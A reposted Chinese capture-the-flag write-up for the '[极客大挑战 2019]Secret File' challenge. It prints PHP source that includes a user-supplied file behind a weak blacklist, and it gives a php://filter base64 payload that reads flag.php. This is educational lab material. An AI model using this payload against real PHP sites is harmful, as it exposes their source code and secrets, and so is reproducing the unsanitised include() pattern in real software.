码迷,mamicode.com
首页 > 其他好文 > 详细

[极客大挑战 2019]Secret File

时间:2020-01-12 22:21:33      阅读:438      评论:0      收藏:0      [点我收藏+]

标签:mamicode   href   lag   charset   epo   file   resource   image   没有   

0x00知识点

没有过滤file

使用php的file伪协议去读取文件

?file=php://filter/convert.base64-encode/resource=flag.php

0x01解题

打开网站存在跳转。抓包,访问
http://152518b2-d342-4872-8adc-b5bcec554a4d.node3.buuoj.cn/secr3t.php
给了我们源代码

<html>????<title>secret</title>????<meta?charset="UTF-8"><?php
????highlight_file(__FILE__);
????error_reporting(0);
????$file=$_GET['file'];
????if(strstr($file,"../")||stristr($file,?"tp")||stristr($file,"input")||stristr($file,"data")){
????????echo?"Oh?no!";
????????exit();
????}
????include($file);?//flag放在了flag.php里?></html>

直接使用file伪协议读
技术图片

base64解密得到flag

[极客大挑战 2019]Secret File

标签:mamicode   href   lag   charset   epo   file   resource   image   没有   

原文地址:https://www.cnblogs.com/wangtanzhi/p/12184620.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!